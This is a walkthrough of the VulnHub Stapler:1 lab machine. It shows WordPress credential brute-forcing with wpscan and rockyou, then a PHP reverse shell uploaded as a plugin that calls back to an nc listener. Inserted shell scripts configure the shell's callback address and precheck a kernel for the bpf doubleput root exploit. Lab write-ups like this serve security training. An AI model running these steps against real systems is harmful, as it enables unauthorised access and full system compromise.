VulnHub Stapler:1
First we determine the IP address assigned to the target and port-scan it.

We see some interesting ports open. We check FTP first: anonymous login works, but the account has no privileges to do anything useful.

We then turn our attention to the web ports. Port 80 turns up nothing.

We check port 12380 to find a landing page and nothing more.

We run Nikto against port 12380.

Nikto reports that the service presents an SSL certificate, i.e. it also speaks HTTPS, and finds two entries: /admin112233 and /blogblog.
Let's check out https://192.168.213.134:12380/admin112233

Nothing useful there. Let's see what is on /blogblog.

Looks like a WordPress site. Let's tackle this one first: low-hanging fruit!
We run wpscan to enumerate users:
wpscan --url https://192.168.213.134:12380/blogblog --enumerate u

We have some usernames. Let's see if we can brute-force credentials for one of them; john looks like a good place to start.
We run
wpscan --url https://192.168.213.134:12380/blogblog --wordlist /usr/share/wordlists/rockyou.txt --username john
(That is the wpscan 2.x syntax; wpscan 3.x takes -U john -P /usr/share/wordlists/rockyou.txt instead.)

And we get a hit.
Let's log in to the WordPress site.

We are in, and we are an admin. Sweet!

From here it is easy to upload a reverse shell through the plugin upload feature.
We grab our trusty PentestMonkey PHP reverse shell: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
and get it ready by pointing its $ip and $port at our listener.

We start our nc listener on port 9978.
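The "get it ready" step is where most failed callbacks come from: the PentestMonkey shell ships with placeholder values ($ip = '127.0.0.1'; and $port = 1234;, each followed by a "// CHANGE THIS" comment) and a shell that phones home to localhost never reaches you. The following helper is an added example, not part of the original write-up or of PentestMonkey's code; it patches those two lines, verifies they landed, and prints the target the shell will call back to. The attacker address 192.168.213.129 in the usage comment is an assumption, substitute your own.

```shell
#!/bin/sh
# Added example (not from the original write-up): point pentestmonkey's
# php-reverse-shell.php at our listener and verify the edit before upload.
# The stock file carries two placeholder lines:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
set -eu

# prepare_shell FILE LHOST LPORT
#   Rewrites the $ip and $port assignments in FILE (the trailing comment is
#   left alone). Returns non-zero if either value is missing afterwards, so a
#   silently failed substitution cannot slip through to the upload step.
prepare_shell() {
    file=$1; lhost=$2; lport=$3
    sed -e "s/^[$]ip = '[^']*';/\$ip = '${lhost}';/" \
        -e "s/^[$]port = [0-9]*;/\$port = ${lport};/" \
        "$file" > "$file.tmp" && mv "$file.tmp" "$file"
    grep -qF "\$ip = '${lhost}';" "$file" && grep -qF "\$port = ${lport};" "$file"
}

# shell_target FILE
#   Prints LHOST:LPORT as currently configured in FILE, for a last look
#   before the file goes into WordPress.
shell_target() {
    ip=$(sed -n "s/^[$]ip = '\([^']*\)';.*/\1/p" "$1")
    port=$(sed -n "s/^[$]port = \([0-9]*\);.*/\1/p" "$1")
    printf '%s:%s\n' "$ip" "$port"
}

# start_listener LPORT
#   Start the catcher before triggering the shell in the browser; nc -n
#   skips DNS so the connection is accepted without delay.
start_listener() {
    nc -nlvp "$1"
}

# Usage (192.168.213.129 is an assumed attacker address):
#   prepare_shell php-reverse-shell.php 192.168.213.129 9978
#   shell_target php-reverse-shell.php
#   start_listener 9978
if [ "$#" -eq 3 ]; then
    prepare_shell "$@"
    shell_target "$1"
fi
```

Run it with the file, your IP and the listener port as arguments; if prepare_shell exits non-zero, the placeholder lines were not found in the expected form and the file should be inspected by hand rather than uploaded.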

Then in WordPress we upload our shell using the plugin feature:

'Upload Plugin'
We browse to our PHP shell


and install it. Easy as pie!
We go to the Media section in WordPress and find our shell.
Click on shell.php

and we see the link to use.
We open a new tab in our browser and enter the URL https://192.168.213.134:12380/blogblog/wp-content/uploads/shell.php
The shell calls back to our listener and we have our limited shell.

We can see that this box is running kernel 4.4.0, and a quick search turns up a candidate local privilege escalation: https://www.exploit-db.com/exploits/39772/ (the bpf double-fdput exploit).

We download the exploit archive to our machine and fetch it onto the victim with wget.

Following the instructions from the exploit we extract the zip file, then extract the tar file and cd into ebpf_mapfd_doubleput_exploit.

From here we run ./compile.sh and then ./doubleput.

We wait for it (it takes a little while)...
We got you! Root.
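A kernel string alone is a weak signal: distro kernels backport fixes without changing the version, and the exploit also depends on unprivileged bpf() being allowed and on having gcc on the box for compile.sh. The following prechecks are an added example, not part of the original write-up or of the EDB 39772 exploit; they encode the upstream window for CVE-2016-4557 (unprivileged bpf() arrived in 4.4, the mainline fix is in 4.5.5) as a coarse filter and then check the two runtime prerequisites. The version window and sysctl name are from the CVE and kernel documentation; everything else (function names, output format) is this example's own.

```shell
#!/bin/sh
# Added example (not from the original write-up): cheap checks to run on the
# target before pulling down and compiling EDB 39772 (CVE-2016-4557,
# the bpf "doubleput" local root). A hit here means "worth trying", not
# "proven vulnerable": stable and distro kernels received the backport
# later without bumping the 4.4.0 prefix.

# version_in_range VERSION
#   Returns 0 when VERSION (e.g. "4.4.0-21-generic") is 4.4.x or 4.5.0-4.5.4,
#   the upstream window between unprivileged bpf() and the fix in 4.5.5.
#   Anything unparsable or outside that window returns 1.
version_in_range() {
    base=${1%%-*}                      # drop the "-21-generic" build suffix
    case $base in
        [0-9]*.[0-9]*) ;;
        *) return 1 ;;
    esac
    maj=$(printf '%s' "$base" | cut -d. -f1)
    min=$(printf '%s' "$base" | cut -d. -f2)
    pat=$(printf '%s' "$base" | cut -d. -f3)
    pat=${pat:-0}
    [ "$maj" -eq 4 ] || return 1
    if [ "$min" -eq 4 ]; then return 0; fi
    if [ "$min" -eq 5 ] && [ "$pat" -lt 5 ]; then return 0; fi
    return 1
}

# bpf_unprivileged_ok
#   The exploit calls bpf() as a normal user. If kernel.unprivileged_bpf_disabled
#   is 1 that path is closed regardless of version; if the file is missing the
#   kernel predates the knob (and the bug).
bpf_unprivileged_ok() {
    f=/proc/sys/kernel/unprivileged_bpf_disabled
    [ -r "$f" ] && [ "$(cat "$f")" = "0" ]
}

# has_compiler
#   compile.sh in the archive builds on the target itself.
has_compiler() { command -v gcc >/dev/null 2>&1; }

# precheck
#   Run all three against the live kernel; one verdict line each, exit 0
#   only if everything passes.
precheck() {
    rc=0
    k=$(uname -r)
    if version_in_range "$k"; then echo "[+] kernel $k inside the 4.4.0-4.5.4 window"
    else echo "[-] kernel $k outside the window"; rc=1; fi
    if bpf_unprivileged_ok; then echo "[+] unprivileged bpf() allowed"
    else echo "[-] unprivileged bpf() disabled or sysctl missing"; rc=1; fi
    if has_compiler; then echo "[+] gcc present"
    else echo "[-] no gcc: build on a matching system and upload the binary"; rc=1; fi
    return $rc
}

# Usage on the target: sh precheck.sh run
if [ "${1:-}" = "run" ]; then precheck; fi
```

If the compiler check fails, compile.sh will not work on the box; build the exploit on a system with the same architecture and libc generation and transfer the resulting binary instead.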

Not too bad. We know there are other ways in, but this was the first run. We can go back and knock on other doors to find other routes.
Thanks to